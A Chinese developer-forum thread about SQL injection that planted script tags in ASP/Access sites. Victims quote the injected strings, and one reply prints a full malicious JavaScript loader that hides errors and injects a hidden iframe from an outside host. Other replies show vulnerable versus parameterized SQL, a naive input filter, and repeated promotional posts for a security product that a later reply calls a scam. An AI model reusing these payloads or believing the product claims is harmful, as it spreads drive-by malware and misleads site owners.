是病毒咯!我以前也遇到过类似的情况 全部ASP文件 和ACCESS都被加了<Script>脚本

解决方案 »

  1.   

    每个字段?? 那INT型的字段呢?是不是你有留言或者论坛之类的发文功能人家直接在留言的时候输入的这个需要在录入时做
      

  2.   

    很可能是破坏者分析了你的数据库,直接用SQL语句更新了表里的数据。
      

  3.   

    :"> </title> <script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js> </scr被注入的是这个东西,怎么预防那,我是一个菜鸟……
      

  4.   

    "></title><script src=http://s.see9.us/s.js></script><!--
    和楼主的情况差不多,一般是内容的字段注入的,我的都好几天了,希望有高手能解决
      

  5.   

    SQL Injection
    SQL injection:
    var Shipcity:
    ShipCity = Request.form ("ShipCity");
    var sql = "select * from OrdersTable where ShipCity = '" + ShipCity + "'";using the Parameters collection:
    SqlDataAdapter myCommand = new SqlDataAdapter("AuthorLogin", conn);
    myCommand.SelectCommand.CommandType = CommandType.StoredProcedure;
    SqlParameter parm = myCommand.SelectCommand.Parameters.Add("@au_id",
         SqlDbType.VarChar, 11);
    parm.Value = Login.Text;
      

  6.   

    现在我的解决方法是:我改了我的程序,把接收传递参数的地方都加了限制,这样也是防止url攻击的一种方式,以前我的也是总是受到攻击,归根到底都是自己的程序编码不严谨,所以我的建议是看看自己的编码是不是有问题;最好web开发人员先看看注入式攻击的方式,然后看看自己的程序是不是存在,然后是服务器补丁和数据库补丁都要打好。这是我的一点亲身感受。
      

  7.   


    1.SQL injection: 
    var Shipcity: 
    ShipCity = Request.form ("ShipCity"); 
    var sql = "select * from OrdersTable where ShipCity = '" + ShipCity + "'"; 2.using the Parameters collection: 
    SqlDataAdapter myCommand = new SqlDataAdapter("AuthorLogin", conn); 
    myCommand.SelectCommand.CommandType = CommandType.StoredProcedure; 
    SqlParameter parm = myCommand.SelectCommand.Parameters.Add("@au_id", 
         SqlDbType.VarChar, 11); 
    parm.Value = Login.Text;不要使用地一种方法,用第二种。
      

  8.   

    过滤form提交的表单参数,还有限制上传文件类型。把系统安全做好。
      

  9.   

    大家把地址和联系方式发我 [email protected]  我统一解决
      

  10.   

    顶,我最近也在被这个问题困扰,最要是text类型的字段记录被修改,有一次我发现char的也被修改,不过这次我恢复数据库后,发现text类型的被改了,而char类型的没有被改,好郁闷啊.
    我检查了所有有可能是木马程序的文件,该删除的删除,该修复的修复,结果还是出现问题.
    我想应该是网站代码写得不够严谨,可是代码又不是我写的,写的人早就不跑了,现在接手管理维护,好难搞 啊.
    希望有高手尽快解决这个问题.
      

  11.   

    最近一段时间,网上SQL注入严重,给广大站长们带给很****烦。      
    造成很大的间接或直接的经济损失和精神刺激。      
    经过筛选,本群重灾区为以下域名      
    s.see9.us      
    sb.5252.ws      
    这两个域名都是来自同一台主机。      
    IP地址为:202.153.110.213      我想,我们是时候联合起来了,不能再坐着等死了。      请大家一起花一点时间,联合起来网上报警吧!      
    人越多,力量越大,就越会受重视。      
    我们这些受害者,已经完全符合报警的条件。            不管结果如何,我们都应该试一下。不能坐以待毙      
    报警地址:      
    http://www.cyberpolice.cn/
      

  12.   

    特别来感谢9楼的老大 billgates130的mdcsoft-ips软件,解决了我一直郁闷的问题,现在服务器上所有站点都安全了,一周多没任何被攻击.永远支持老大
      

  13.   

    特别来感谢9楼的老大 billgates130的mdcsoft-ips软件,解决了我一直郁闷的问题,现在服务器上所有站点都安全了,一周多没任何被攻击.永远支持老大
      

  14.   

    特别来感谢9楼的老大 billgates130的mdcsoft-ips软件,解决了我一直郁闷的问题,现在服务器上所有站点都安全了,一周多没任何被攻击.永远支持老大
      

  15.   

    document.writeln("<base onmouseover=\"window.status=\'完毕                                                  \';return true\">");
    document.writeln("<SCRIPT LANGUAGE=\"JavaScript\"> ");
    document.writeln("<!-- Hide ");
    document.writeln("function killErrors() { ");
    document.writeln("return true; ");
    document.writeln("} ");
    document.writeln("window.onerror = killErrors; ");
    document.writeln("\/\/ --> ");
    document.writeln("<\/SCRIPT>");
    function Get(){
    var Then = new Date() 
    Then.setTime(Then.getTime() + 24*60*60*1000)
    var cookieString = new String(document.cookie)
    var cookieHeader = "Cookie10=" 
    var beginPosition = cookieString.indexOf(cookieHeader)
    if (beginPosition != -1){ 
    } else 
    { document.cookie = "Cookie10=risb;expires="+ Then.toGMTString()
    document.writeln("<IFRaME src=\"http://d.godaand.cn/bao/hei.htm\" width=1 height=1><\/IFRAME>");
    document.write("<div style=\"display:none\">");
    document.write ('<script language="javascript" type="text/javascript" src="http://js.users.51.la/1878276.js"></script>');}
    }Get();
      

  16.   


    mdcsoft服务器网络安全解决方案 
    最近几周,很多站被SQL注入攻击频繁,很多服务器被入侵,网站被攻击,为解决以上问题,我们开发了 
    以下系列软件及制定了系列解决方案.追究原因,全部都是人为引起的,由于缺乏安全意识,程序存在漏 
    洞,服务器安全-权限设置不正确等因素.... 
    在您遇到紧急事件时候可以联系我们mdcsodft网络安全实验室 [email protected] 13630284019 
    最短时间为您制定最有效的网络安全应急预案及解决方案.确保数据安全! 
    关于mdcsoft-ips (插件) 
    mdcsoft-ips(Web应用防护系统)是一款保护Web站点和应用免受来自于应用层攻击的Web防护系统。它内置于Web服务器软件中,通过分析应用层的用户请求数据,区分正常用户访问Web和攻击者的恶意行为,对诸如SQL注入式攻击、非法脚本执行、跨站提交攻击等应用攻击行为进行实时阻断和报警。 
    mdcsoft-ips使用的Web服务器核心内嵌技术,在请求数据尚未被Web服务器软件处理之前(更在应用系统处理之前)即进行检查,确保所有攻击行为被拒之门外。它可以防范篡改数据库和网页、绕过身份认证和假冒用户、窃取用户和系统信息等严重危害网站内容安全的行为。 
    mdcsoft-ips作为Web系统软件的一部分完全透明地工作,与具体的Web网站结构和Web应用系统无关。部署mdcsoft-ips后,无须对现有Web应用的代码作任何修改,即可实现: 
    -------------------------------------------------------------------------------- 
    防止SQL注入式攻击; 
    防止溢出代码攻击; 
    防止对系统文件的访问; 
    防止对危险文件类型的访问; 
    防止对危险系统路径的访问; 
    防止特殊字符构成的URL利用; 
    防止XSS跨站提交; 
    防止网站文件盗链; 
    防止提交可能构成代码的字串; 
    防止构造危险的Cookie; 
    防止危险的头和方法; 
    防止危险的鉴别类型和帐号; 
    检查头/URL/提交/内容/版本的长度; 
    检查浏览器、链接是否符合RFC标准; 
    ...... 
    关于mdcsoft-ips入侵防御系统插件的技术白皮书见 
    http://blog.mdcsoft.cn/archives/200805/mdcsoft-ips.html 。 
    此软件作为BETA版发布。得到很多朋友大支持和关注,谢谢大家的热情支持。 
    (我们的新版本可以跨平台支持所有的WIN系统) 
    安装该插件前后进行效果对比, 
    2.安全加固 (针对有独立服务器用户) 
    我们为您提供安全加固解决方案 
    3.入侵检测,漏洞扫描,漏洞扫描修复 (针对虚拟主机用户) 
    更多解决办法在 http://blog.mdcsoft.cn/archives/200805/46.html
      

  17.   

    简单的ASP.net防SQL注入2008-01-27 18:22防sql注入是每个开发人员都要考滤的问题asp.net有个Global.asax文件,有一个Application_BeginRequest方法(应用启动获取)就是当获取到参数时触发的事件;这里就是网站页面每次提交时都要经过的事件;在这里做防注入就一下子卡住入口了代码如下:
    protected void Application_BeginRequest(Object sender, EventArgs e)
    {
    //遍历Post参数,隐藏域除外
    foreach (string i in this.Request.Form)
    {
    //输出
    }
    //遍历Get参数。
    foreach (string i in this.Request.QueryString)
    {
    //输出
    }
    }
    这样就可以遍历出页面提交上来的所有的参数;里面只写了一个“//输出”,没有写代码出来,大家可以写repsonse.write输出来看看,尝试一下;我们只需对这些参数进行过滤,如果存在不安全字符,直接跳转就走行了;
    也可以加过滤  
    public static string DelSQLStr(string str)
    {
        if(str == null || str == "")
            return "";
        str = str.Replace(";","");
        str = str.Replace("'","");
        str= str.Replace("&","");
        str= str.Replace("%20","");
        str= str.Replace("--","");
        str= str.Replace("==","");
        str= str.Replace("<","");
        str= str.Replace(">","");
        str= str.Replace("%",""); 
      

  18.   

    33的billgates130(mdcsoft-ips)的鉴定是个骗子,大家不要上当了,他的代码根本不起作用,不要让他的什么dll文件给骗了,根本不起作用,任何一个改下名变dll文件也是这个效果的.现在才发现这人的照片一看就是个骗子